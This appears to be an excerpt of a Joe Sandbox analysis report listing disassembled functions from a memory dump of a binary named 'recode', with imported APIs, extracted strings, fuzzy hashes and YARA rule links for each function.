Opcode Fuzzy Hash: 32b5e8ad24c3b9d0c80a19e7b11250912477da1240351b5aff254f968c3453a4
Instruction Fuzzy Hash: EC920532A04AC68BE755EF35D8402B9F7A1EF55B54F8C8236CA4D5B2E4EF38E0448764

Function 00007FF758026910 Relevance: 7.8, APIs: 6, Instructions: 334COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140 ref: 00007FF7580269F3
memcmp.VCRUNTIME140 ref: 00007FF758026B54
memmove.VCRUNTIME140 ref: 00007FF758026B8E
memmove.VCRUNTIME140 ref: 00007FF758026C9B
memmove.VCRUNTIME140 ref: 00007FF758026CBD
memcmp.VCRUNTIME140 ref: 00007FF758026DA0

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memcmpmemmove
String ID:
API String ID: 1261870273-0
Opcode ID: 37ec01ecd31d47f630f486a3ee38776845baca789d607b860b8d783d4d5bb774
Instruction ID: f041451d359a1469f9c69ba6f6fd642c70e5b996df366d7d04d4128feeee4b43
Opcode Fuzzy Hash: 37ec01ecd31d47f630f486a3ee38776845baca789d607b860b8d783d4d5bb774
Instruction Fuzzy Hash: 57F1BC72B00B858BEB10DF29C4847ADB3A4FB48B88F459226CE5E57784DF78E585C354

Function 00007FF758004640 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 269COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF758004839
memset.VCRUNTIME140 ref: 00007FF758004877
memmove.VCRUNTIME140 ref: 00007FF7580048BD
memmove.VCRUNTIME140 ref: 00007FF7580049AF

Strings

#MOVE, xrefs: 00007FF758004A70

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmovememset
String ID: #MOVE
API String ID: 1288253900-3098322713
Opcode ID: e790beed1c877c6dbc7c87161f1447eb7ee856dac1d6d4db1f567ba9b5feca7f
Instruction ID: 198b34e29ea8c46190afb1fe1895212fd35aee87afdc7f238410295b47b154e1
Opcode Fuzzy Hash: e790beed1c877c6dbc7c87161f1447eb7ee856dac1d6d4db1f567ba9b5feca7f
Instruction Fuzzy Hash: B9E15072606B819AD758DF29E9447A8B7A8F704B54FAC4239C7AC073A0DF35E076C718

Function 00007FF7580479C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 209threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF758047CD0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF758047D09

Strings

:, xrefs: 00007FF758047A6C
S2345678, xrefs: 00007FF758047A75

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: CreateThread_invalid_parameter_noinfo_noreturn
String ID: :$S2345678
API String ID: 2430190256-776604456
Opcode ID: b3de1c8e70cdef13a6ede55855075978fc1f2f30870408cdd77b418e00acc506
Instruction ID: 6f1c51eead752471d13d9ee01c88105206f64049b943523429b81f339d571ea6
Opcode Fuzzy Hash: b3de1c8e70cdef13a6ede55855075978fc1f2f30870408cdd77b418e00acc506
Instruction Fuzzy Hash: F6A12D22E18B928BF702E77594412BCE760AF53784F988336EE5C32AD5EF39A545C314

Function 00007FF75802ACD0 Relevance: 6.8, APIs: 4, Instructions: 807COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802B3A2
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802B3D2
memmove.VCRUNTIME140 ref: 00007FF75802B887
memmove.VCRUNTIME140 ref: 00007FF75802B8A5

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmovesqrtf
String ID:
API String ID: 1859266664-0
Opcode ID: f135f61782b82863bed2159e243d1ad8e45a247cf0736b8aa110420540564d04
Instruction ID: 6218f5acd127551e9fcf0650b0011eb958ef0e869f1643e617b62938a33f76cc
Opcode Fuzzy Hash: f135f61782b82863bed2159e243d1ad8e45a247cf0736b8aa110420540564d04
Instruction Fuzzy Hash: C162AD13E287E846E3129736508227AF791AF6E784F1DC723FD49A66A1DB3DE452C700

Function 00007FF75801BE40 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 363COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF75801C359
memset.VCRUNTIME140 ref: 00007FF75801C387

Strings

Remaining, xrefs: 00007FF75801C2A3
Processed, xrefs: 00007FF75801C298

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmovememset
String ID: Processed$Remaining
API String ID: 1288253900-3602939160
Opcode ID: a202173382056f6968939bb1155a78b99caf73d854b9cf65573903230dc7c6d5
Instruction ID: a22b4cc889cca35c81352dfb0eedb689864521c67f89dc513adef340d03643e8
Opcode Fuzzy Hash: a202173382056f6968939bb1155a78b99caf73d854b9cf65573903230dc7c6d5
Instruction Fuzzy Hash: 98F13772A082C14BD7259F25D95037AF7A0EB96728F9C4235DE8D076C4EB3CE548CB64

Function 00007FF758036660 Relevance: 6.3, APIs: 4, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4e862473466c8cb84ea1cb16154531e9bb377cae74c09d4127e5031e472f26
Instruction ID: 3e5515e3b18293d825c6a159ba4f7822700675c55e959bdbbe7b97adca8658fb
Opcode Fuzzy Hash: bb4e862473466c8cb84ea1cb16154531e9bb377cae74c09d4127e5031e472f26
Instruction Fuzzy Hash: 60A12501E18B8D42F413A23B5102AB5D2461F7B3C0EACD733E96E316D1EF2DB1DA5518

Function 00007FF758035B60 Relevance: 6.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758035CEE

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: d1ba85553e95979fe09041fb53cc58437645577c49201d1ae6c2ed7c7d94c9f7
Instruction ID: be79adb3625ec4f6771afc3ab4921050a6aeb78ce91a8938ee212839ad3797aa
Opcode Fuzzy Hash: d1ba85553e95979fe09041fb53cc58437645577c49201d1ae6c2ed7c7d94c9f7
Instruction Fuzzy Hash: 99612222D28A9D82E163723A91425B9E1904F7F38AEADD733F84D359F1EF2C31C50518

Function 00007FF758036380 Relevance: 6.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75803651A

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288df2fd5d168fc6a7b895d1eb10c9c2d4987aa47d01bdbd80ddd1eed73e0356
Instruction ID: ccc2dfe30ad2b20cb71e78219a4b3d866f65672ef18429a495f2cb948bba97fe
Opcode Fuzzy Hash: 288df2fd5d168fc6a7b895d1eb10c9c2d4987aa47d01bdbd80ddd1eed73e0356
Instruction Fuzzy Hash: 7C712212D08B8D42E023A33B91125B5E2521F7F7C4E6CD733F86E315A1EF28B2D95928

Function 00007FF75805F900 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF75805F92C
GetCurrentThreadId.KERNEL32 ref: 00007FF75805F93A
GetCurrentProcessId.KERNEL32 ref: 00007FF75805F946
QueryPerformanceCounter.KERNEL32 ref: 00007FF75805F956

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1e7e34961b0ff368d9259f46a631c6023798f87f641460ec3e4101f183495e56
Instruction ID: 4e4852c23007fe59132dd2f8d8c63009634846275b451b304e34d08ea6580d4d
Opcode Fuzzy Hash: 1e7e34961b0ff368d9259f46a631c6023798f87f641460ec3e4101f183495e56
Instruction Fuzzy Hash: 15117022B15F458AEB00DF61E8442B8B3A4FB59758F881E31DB2D467A4DF7CD1998350

Function 00007FF758012B50 Relevance: 5.4, Strings: 4, Instructions: 437COMMON

Download Yara Rule

Strings

<NULL>, xrefs: 00007FF758012EAD
[nav] NavMoveRequest: clamp NavRectRel for gamepad move, xrefs: 00007FF75801300A
[nav] NavMoveRequestForward %d, xrefs: 00007FF758012BEC
[nav] NavInitRequest: from move, window "%s", layer=%d, xrefs: 00007FF758012EBB

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: <NULL>$[nav] NavInitRequest: from move, window "%s", layer=%d$[nav] NavMoveRequest: clamp NavRectRel for gamepad move$[nav] NavMoveRequestForward %d
API String ID: 0-586442257
Opcode ID: 690a005ab7af66ac8f65ff07ab89e592973130c6f6d1717f792c15fcac168659
Instruction ID: a1739413e8dccadc6f41641d062c6ba73ad2388d39ff13e6887c1172eb862eb9
Opcode Fuzzy Hash: 690a005ab7af66ac8f65ff07ab89e592973130c6f6d1717f792c15fcac168659
Instruction Fuzzy Hash: 03223822E087C587E752EB3684012B9F350EF6A764F5D8731DF5C261E5EF2870898768

Function 00007FF75805FAA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF758001AA5), ref: 00007FF75805FACE
FormatMessageA.KERNEL32 ref: 00007FF75805FB01

Strings

!x-sys-default-locale, xrefs: 00007FF75805FAC1

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 7675db42999968172565dd587b6bc4d9fec7a9d2f9b9ff111f740ac6b1d2d352
Instruction ID: 47d198640ccfac83b82e81d9abbcda05a319e98681c17d274a9042011535ca7e
Opcode Fuzzy Hash: 7675db42999968172565dd587b6bc4d9fec7a9d2f9b9ff111f740ac6b1d2d352
Instruction Fuzzy Hash: 37018B72B0878283F7119B12A450B6AE7A1FB88788F984135DA4D06BC4DE3CD8098724

Function 00007FF7580360A0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758036250
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758036286
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580362B3

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65f5de4cff587d394fdac7c5d57e6141fa2c5fbdd011f0737969a26f60a1bd7d
Instruction ID: dc783359920a0ee67891fe8e2e0f8b306640d9ae5c54943e049ad0d9a04ded55
Opcode Fuzzy Hash: 65f5de4cff587d394fdac7c5d57e6141fa2c5fbdd011f0737969a26f60a1bd7d
Instruction Fuzzy Hash: 4D71AE12D2CF8E46E023723645421B6E2555F7F285E6DD723BCAE318F1AF1970DB5128

Function 00007FF7580060D0 Relevance: 4.4, APIs: 2, Instructions: 1936COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF75800692B
memmove.VCRUNTIME140 ref: 00007FF758006A40

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: f46fef4588b1f3a54b1cc1155fe25963bbc3be7f011017fd62116e220f623e5d
Instruction ID: 779d87b7634d5b689524d58d504de54aa5043c3e9fecef8b65df96859f82d22e
Opcode Fuzzy Hash: f46fef4588b1f3a54b1cc1155fe25963bbc3be7f011017fd62116e220f623e5d
Instruction Fuzzy Hash: 9823C532A087C59BE75A9B3681413B9F7A0FF59344F888725DB6D235E1DB38B0A8C714

Function 00007FF758030E60 Relevance: 4.4, APIs: 3, Instructions: 602COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF75803107B
memmove.VCRUNTIME140 ref: 00007FF75803108E
memset.VCRUNTIME140 ref: 00007FF75803122D

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$memset
String ID:
API String ID: 3790616698-0
Opcode ID: 621d5a6e91c54b21ebbc09b495eaf79d4cba85c4082f09ab982111f70203d7a1
Instruction ID: 6d6a936dfce4e6902a726ec80fba201d001bb3e155d3263f1ea861763deaa20c
Opcode Fuzzy Hash: 621d5a6e91c54b21ebbc09b495eaf79d4cba85c4082f09ab982111f70203d7a1
Instruction Fuzzy Hash: 5D524776705B8986DB20DF2AD5846EDB760FB89B88F458226DF4E07B68CF39D158C700

Function 00007FF758036A60 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 433COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758036BFB

Strings

@, xrefs: 00007FF7580370AB

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID: @
API String ID: 3445610689-2766056989
Opcode ID: 72f1d6c30f2319be7865358cd199b5206d339a4e9c94c151f11a30eaf5e7c1e6
Instruction ID: 864b95e26704c581e994a5ce8cccd3dfdc3d8ce3ff98eea91a1124beee56b64d
Opcode Fuzzy Hash: 72f1d6c30f2319be7865358cd199b5206d339a4e9c94c151f11a30eaf5e7c1e6
Instruction Fuzzy Hash: 08122B23D0CBCD86E663A63790412B6F350AFAE384F5C8731ED5C365E2DF29B4859614

Function 00007FF758037240 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 432COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580373DB

Strings

@, xrefs: 00007FF75803788B

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID: @
API String ID: 3445610689-2766056989
Opcode ID: 46575f1cd323fe0297ff4fbcc55ce74e1228904fa52ef2a583cd22547f9aa0b3
Instruction ID: 2979c8c6d9372274123889da87c13d59467ee6b99d6bad196d7c41ab71afa1fc
Opcode Fuzzy Hash: 46575f1cd323fe0297ff4fbcc55ce74e1228904fa52ef2a583cd22547f9aa0b3
Instruction Fuzzy Hash: AC12FB23D1C7CD87E253A63790422BAF350AFAE384F5C9732ED4C266E2DF2975858614

Function 00007FF758038B50 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 432COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758038CF6

Strings

@, xrefs: 00007FF7580391AF

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID: @
API String ID: 3445610689-2766056989
Opcode ID: 3fb4eda2a78adc1b34fb0a52c4ad887fb0a0e34e849c03a7845ffb271f10caf7
Instruction ID: d6ebd982453622c7d048024fe29f82ae86323d1a69abba0bf110eb37c82ef3ae
Opcode Fuzzy Hash: 3fb4eda2a78adc1b34fb0a52c4ad887fb0a0e34e849c03a7845ffb271f10caf7
Instruction Fuzzy Hash: F812DC23D0CBCD86E663A63794421B6F350AF6E7C4F5C8732EE4C366E2DF2965848614

Function 00007FF758039350 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 432COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580394F6

Strings

@, xrefs: 00007FF7580399AF

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
